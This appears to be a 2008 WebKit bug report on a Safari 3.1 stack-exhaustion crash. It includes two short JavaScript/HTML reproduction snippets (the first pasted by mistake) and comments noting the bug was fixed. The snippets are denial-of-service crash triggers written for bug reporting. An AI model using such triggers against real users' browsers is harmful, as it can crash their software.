Bug 19514 - DOM modification causes stack exhaustion (exact cause unknown)
Summary: DOM modification causes stack exhaustion (exact cause unknown)
Status: RESOLVED FIXED
Alias: None
Product: WebKit
Classification: Unclassified
Component: New Bugs
Version: 525.x (Safari 3.1)
Hardware: PC Windows Vista
Importance: P1 Critical
Assignee: Nobody
URL: http://skypher.com/SkyLined/Repro/Saf...
Keywords: InRadar
Depends on:
Blocks:
 
Reported: 2008-06-12 04:16 PDT by Berend-Jan Wever
Modified: 2016-11-28 17:30 PST

Description Berend-Jan Wever 2008-06-12 04:16:13 PDT
I found that the following JavaScript causes a stack exhaustion:

<BODY onload="go()"><SCRIPT>
    function go() {
        var oEmbed=document.createElement('embed');
        document.body.appendChild(oEmbed);
        var oEmbed2 = oEmbed.cloneNode();
        oEmbed2.appendChild(document.body.parentElement);
        var oA = document.createElement('a');
        document.title = '';
        oA.innerHTML = '<x><html></html>';
    }
</SCRIPT></BODY>

Tested with Safari 3.1.1.

Marked as security; I'm not sure if you treat DoS as a security issue, so I'm erring on the safe side.
Comment 1 Berend-Jan Wever 2008-06-12 04:22:27 PDT
(In reply to comment #0)
OOOPS. I copy+pasted the wrong code (see bug 19516). This is the real repro code for this case:
<BODY onload="go()"><SCRIPT>
    function go() {
        oStrike=document.createElement('b');
        oStrike.innerHTML='<object><table></table><colGroup></colGroup></object>';
        document.body.parentElement.appendChild(oStrike);
    }
</SCRIPT></BODY>
Comment 2 Berend-Jan Wever 2008-06-13 06:29:01 PDT
Changing priority and security flag
Comment 3 Mark Rowe (bdash) 2008-06-13 14:52:30 PDT
<rdar://problem/6007109>
Comment 4 mitz 2008-07-05 01:29:12 PDT
I cannot reproduce in r35011. I think this bug was fixed along with bug 15919 in <http://trac.webkit.org/changeset/34692>.